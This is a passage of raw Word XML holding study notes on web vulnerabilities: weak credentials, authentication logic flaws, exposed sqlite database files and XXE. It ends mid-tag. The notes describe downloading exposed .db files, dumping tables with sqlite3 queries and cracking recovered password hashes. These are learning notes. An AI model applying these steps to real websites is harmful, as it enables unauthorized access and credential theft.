        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use of weak credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15A84F" w14:textId="4F10C163" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak session cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7E528" w14:textId="268044A1" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Predictable values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D58D96" w14:textId="6A3B342A" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mitigation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D29FD" w14:textId="252E899C" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Strong password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561EE22" w14:textId="40CDFFD1" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Automatic lockout after certain number of attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DBB91C" w14:textId="32DB6F95" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD867F9" w14:textId="54EDB494" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Broken Authentication Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E356337" w14:textId="1300F62C" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Logic flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0AD49" w14:textId="0B3FB7F9" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Developers forget to sanitize the input (username &amp; password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268181DB" w14:textId="05F09ADF" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vulnerable to SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A721355" w14:textId="5647B2F9" w:rsidR="000106D7" w:rsidRPr="0084205E" w:rsidRDefault="000106D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Re-registration of an existing user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A9CCCE" w14:textId="0632000C" w:rsidR="000106D7" w:rsidRPr="0084205E" w:rsidRDefault="000106D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">“admin” versus </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47386E3A" w14:textId="6CC18918" w:rsidR="00033D97" w:rsidRPr="0084205E" w:rsidRDefault="00033D97" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Register and then login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5536E" w14:textId="1B770731" w:rsidR="00033D97" w:rsidRPr="0084205E" w:rsidRDefault="00033D97" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BAD48" w14:textId="4CB4DAF6" w:rsidR="00033D97" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Accidentally divulge sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140DC78" w14:textId="6678013C" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D458FA" w14:textId="7B7E0E77" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">May involve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDE597" w14:textId="19F23CF9" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>May rely solely on web app vulnerabilities and directly on web server itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19D480" w14:textId="13CD5903" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>It is common to store large amounts of data in a database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC744C" w14:textId="24E493E3" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web application use – SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A1F2A" w14:textId="12DB0093" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Databases set up on dedicated servers or files (flat-file databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1D33A" w14:textId="40B635A6" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Flat-file databases are stored on a single file on the computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29350676" w14:textId="58735C0D" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sometimes stored within root directory of the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F56AE" w14:textId="64E20E7A" w:rsidR="00670BD2" w:rsidRPr="0084205E" w:rsidRDefault="00670BD2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If accessible by a website user, it can be downloaded and queried on own machine, with full access to everything on database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F524353" w14:textId="2C8CDB8C" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Flat-file database syntax and format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF5C22" w14:textId="27D1E7CA" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Format is commonly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AB5F6E4" w14:textId="299E0056" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Interacted with many programming languages and has a dedicated client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FB36B" w14:textId="70FED754" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97AD5E" w14:textId="093BFE7D" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: sqlite3 &lt;database-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9EAD8B" w14:textId="1BCCD0D4" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B740F46" w14:textId="6E6D516F" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To dump data from table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA087B" w14:textId="2CB267FD" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">PRAGMA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>table_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(customers</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="534C1F63" w14:textId="688C901E" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>customer;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7381D072" w14:textId="443525F3" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If something like password hashes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> found, Kali has tools for crack them or use online </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – good for weak password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDB4D1" w14:textId="457AFBF1" w:rsidR="00B74403" w:rsidRPr="0084205E" w:rsidRDefault="00B74403" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect element for developer notes in source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A202292" w14:textId="2B7C823D" w:rsidR="000E0D31" w:rsidRPr="0084205E" w:rsidRDefault="000E0D31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If directory found, input in URL at end of IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D274A" w14:textId="74ED6CB0" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> database files, download and use sqlite3 to search for information to login to web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F80A4" w14:textId="23F0AEE0" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XML External Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63718C15" w14:textId="4A0BB238" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Abuses features of XML parsers/data, allows attacker to interact with any backend or external systems that application can access and allow files to be read on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0F37F" w14:textId="014EA702" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also cause DoS or SSRF, port scanning and remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169A80E" w14:textId="7C5E0558" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two Types of XXE Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFFEED0" w14:textId="2D202839" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>In-band – attacker can receive an immediate response to XXE payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3D146" w14:textId="2DB48FA1" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Out-of-band – blind XXE – no immediate response from web application and attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> reflect the output of their XXE payload to some other file or own server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6DE7E" w14:textId="55C180C8" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">XML External Entity – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
